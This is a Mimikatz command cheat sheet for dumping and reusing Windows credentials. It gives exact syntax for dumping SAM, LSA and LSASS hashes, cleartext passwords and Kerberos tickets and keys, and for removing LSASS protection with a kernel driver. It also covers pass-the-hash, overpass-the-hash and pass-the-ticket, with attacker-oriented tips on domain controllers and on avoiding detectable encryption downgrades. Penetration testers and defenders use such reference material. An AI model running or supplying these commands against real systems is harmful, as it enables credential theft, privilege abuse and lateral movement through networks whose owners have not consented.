Mimikatz is a tool for dumping and reusing credentials (NT hashes, cleartext passwords where a provider still caches them, Kerberos tickets and keys) from a compromised Windows machine. Most commands need a high-integrity (elevated) token or SYSTEM.
Usage
Acquiring Privilege
privilege::debug
(enable SeDebugPrivilege in the current token; needed to open LSASS for the sekurlsa::* commands and for token::elevate)
token::elevate
(impersonate a SYSTEM token from a high-integrity process, if not already SYSTEM; needed for lsadump::sam and anything else that reads SYSTEM-only registry data)
Dumping Credentials
lsadump::sam
(dump local account NT hashes from the SAM hive; local users only. The SAM is readable only by SYSTEM, so run token::elevate first, or pass exported hives with /sam: and /system: offline)
lsadump::lsa [ /patch | /inject ]
(dump hashes from the LSA: /patch patches LSASS in memory and returns NT hashes, which is enough on a workstation; /inject injects into LSASS and also returns supplemental credentials such as Kerberos AES keys and password history, which is what you want on a DC. "Patch" refers to memory patching, see this article)
sekurlsa::logonpasswords
(dump the credentials of every logon session held in LSASS: NT hashes from the msv provider, plus cleartext passwords where wdigest, tspkg or kerberos still cache them; this includes users logged on remotely via RDP, scheduled tasks and services)
- If LSASS runs as a protected process (RunAsPPL), opening it from user mode is refused; install the signed mimidrv.sys driver as a service (the `!+` command) and then strip the protection with `!processprotect /process:lsass.exe /remove`. Loading a kernel driver is noisy and shows up in driver-load telemetry.
sekurlsa::msv
(dump only the msv provider entries, i.e. the NT/LM hashes of local and domain users for each logon session)
kerberos::list /export
(list the Kerberos tickets of the current logon session through the LSA API and write each one to a .kirbi file; no elevation needed, but only the current session is visible)
sekurlsa::tickets /export
(dump the tickets of all logon sessions from LSASS memory; in the output "TGT" is the ticket-granting ticket and "TGS" is a service ticket issued by the ticket-granting service)
sekurlsa::ekeys
(dump the cached Kerberos encryption keys, e.g. AES256, of each logon session; debug privilege required. The AES keys can be fed to sekurlsa::pth instead of an NT hash)
Using Credentials
sekurlsa::pth
(pass-the-hash: start a process whose outbound network authentication uses the supplied NT hash, by patching its new logon session in LSASS)
- Format:
sekurlsa::pth /user:DOMAIN_USER /domain:DOMAIN /ntlm:NTLM_HASH /run:COMMAND
- /run defaults to cmd.exe. The spawned process still runs as the local user; only what it presents on the network changes. /aes256:KEY (from sekurlsa::ekeys) can replace /ntlm: for overpass-the-hash with AES, which avoids the RC4 encryption-type downgrade that an NT-hash-based Kerberos request causes.
- Run it from the elevated (high-integrity) session with SeDebugPrivilege, but not while impersonating SYSTEM: if you ran token::elevate, use
token::revert
first. sekurlsa::pth spawns the process with CreateProcessWithLogonW, which cannot be called from a LocalSystem token, so pass-the-hash from the elevated SYSTEM token does not work.
kerberos::ptt
(pass-the-ticket)
- Format:
kerberos::ptt TICKET.kirbi
(inject the ticket into the current logon session; elevated privilege not necessary. A directory path can be given instead of a file to inject every .kirbi in it)
Miscellaneous
kerberos::purge
(get rid of tickets in the current session)